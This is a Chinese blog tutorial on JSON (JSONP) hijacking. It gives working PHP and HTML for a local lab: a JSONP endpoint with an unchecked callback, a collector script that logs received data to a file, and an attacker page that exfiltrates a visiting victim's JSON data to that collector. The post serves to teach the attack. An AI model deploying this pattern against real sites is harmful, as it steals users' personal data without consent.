【Json劫持】Json的劫持原理 2021-07-07 | HTML | | | 300 前言 Json劫持形式 Json劫持当前目录创建三个文件 然后json.php中写入 123456789101112<?php/*# -*- coding: utf-8 -*-# @Author: GuYing# @Date: 2021/8/15*/header('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"id":"1","name":"dongjun","email":"qq@Qmo.com"});';?> 下面一个jsonre.php中写入来获取信息 123456789<?php$content = $_GET['file'];if(isset($content)){ file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);}else{ echo 'no data input';}?> 最后一个index.html写一个网站来发包,获取数据传入jsonre.php中,json利用是和csrf很像的,都是需要被攻击者点击,index.html中写入 12345678910111213141516171819<!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title> <script> function test(data){ //alert(v.name); var xmlhttp = new XMLHttpRequest(); var url = "http://127.0.0.1/json-xpath/jsonre.php?file=" + JSON.stringify(data); xmlhttp.open("GET",url,true); xmlhttp.send(); } </script> <script src="http://127.0.0.1/json-xpath/json.php?callback=test"></script></head><body></body></html> json.php显示的数据 当受害者打开index.html之后,就会将json数据发给攻击方 本地生成数据.txt的形式 我的个人博客 孤桜懶契:http://gylq.gitee.io 本文标题:【Json劫持】Json的劫持原理 文章作者:孤桜懶契 发布时间:2021年07月07日 - 12:00:00 最后更新:2022年05月20日 - 11:47:45 原始链接:https://gylq.gitee.io/posts/107.html 许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。 -------------------本文结束 感谢您的阅读------------------- 坚持原创技术分享,感谢您的支持和鼓励! 打赏 微信支付 支付宝